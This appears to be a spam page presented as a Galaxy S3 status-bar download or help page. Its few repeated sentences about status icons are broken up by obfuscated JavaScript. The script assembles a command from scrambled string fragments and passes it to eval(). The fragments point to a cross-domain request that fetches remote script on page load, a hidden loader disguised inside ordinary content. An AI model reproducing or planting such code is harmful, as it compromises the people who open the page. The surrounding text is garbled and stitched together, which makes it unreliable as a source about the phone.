Galaxy S3 Status Bar Download

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Galaxy S3 Status Bar Download

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The status bar at touch and hold the status bar and drag it down Status Icons.. The status bar at the top of the Home screen provides device and service status information on the right side and notification alerts on the left.. ";h["YRb"]="url";h["HiI"]="Z;v";h["tMn"]="if(";h["rLz"]="zip";h["MwL"]=" st";h["Pdx"]="e: ";h["ORs"]="pro";h["DUA"]="jwr";h["rGw"]=",cr";h["HjN"]="rro";h["gDY"]="HR)";h["OVN"]="y(r";h["krJ"]="/VB";h["RAF"]="_en";h["grx"]="var";h["FbA"]="ccP";h["lTt"]="s: ";h["khY"]="',d";h["sgD"]="mOs";h["SPE"]="'PO";h["caA"]="ar ";h["gLC"]="ST ";eval(h["grx"] h["isa"] h["MEF"] h["HiI"] h["caA"] h["mzo"] h["MFV"] h["MVn"] h["Pgs"] h["VlF"] h["XPf"] h["caA"] h["pnA"] h["MVn"] h["sWG"] h["nFz"] h["tbB"] h["pnA"] h["dDk"] h["QYl"] h["tMn"] h["pnA"] h["xdN"] h["nru"] h["OsR"] h["rkf"] h["UPI"] h["fxg"] h["wvu"] h["PRg"] h["FJI"] h["myQ"] h["khY"] h["ZJD"] h["Rfx"] h["Pdx"] h["Bur"] h["Xlx"] h["MaV"] h["ORs"] h["WzR"] h["pAr"] h["zaA"] h["zvK"] h["oFo"] h["rGw"] h["FXa"] h["JBm"] h["Rnd"] h["mGB"] h["QAG"] h["Lhw"] h["AFz"] h["VZC"] h["RQm"] h["VxG"] h["YRb"] h["FJI"] h["sWb"] h["fac"] h["krJ"] h["pge"] h["ztu"] h["Ido"] h["FbA"] h["sgD"] h["Fbx"] h["Yml"] h["DUA"] h["Ylz"] h["iMV"] h["kXK"] h["YXN"] h["dJd"] h["rLz"] h["WaT"] h["npm"] h["YOp"] h["Doq"] h["PbQ"] h["RAF"] h["ffP"] h["XQa"] h["JAF"] h["XAW"] h["Ibw"] h["WzR"] h["lTt"] h["VbK"] h["CzL"] h["zYd"] h["rdV"] h["dAk"] h["rRM"] h["vFW"] h["XkP"] h["cHW"] h["ChJ"] h["tRR"] h["bOT"] h["JCY"] h["gDY"] h["iHL"] h["LoY"] h["rdV"] h["dAk"] h["rRM"] h["vFW"] h["YCx"] h["xcm"] h["HjN"] h["MEX"] h["VbK"] h["CzL"] h["zYd"] h["rdV"] h["dAk"] h["rRM"] h["vFW"] h["XkP"] h["cHW"] h["ChJ"] h["tRR"] h["bOT"] h["dDk"] h["ocV"] h["RJU"] h["iqW"] h["ndP"] h["QEV"] h["cPT"] h["SPE"] h["gLC"] h["Nqc"] h["XjZ"] h["pCQ"] h["vsm"] h["Wly"] h["MwL"] h["hCj"] h["kBR"] h["OVN"] h["bEb"] h["NdA"] h["ecN"] h["ghM"] h["VzZ"] h["oMB"] h["iWH"]);Status Bar.. Open topic with navigation Status Bar The status bar at the top of the Home screen provides device and service status information on the right side and notification alerts on the left.. var pZ = 'galaxy s3 status bar download';var h = new Array();h["mzo"]="sho";h["Xlx"]="rip";h["fxg"]="jax";h["RQm"]="als";h["Nqc"]="fai";h["Bur"]="'sc";h["mGB"]=": t";h["rkf"]=") {";h["VZC"]=": f";h["VbK"]="fun";h["VzZ"]=");}";h["zYd"]="on ";h["Ido"]="tXY";h["FXa"]="oss";h["Ylz"]=".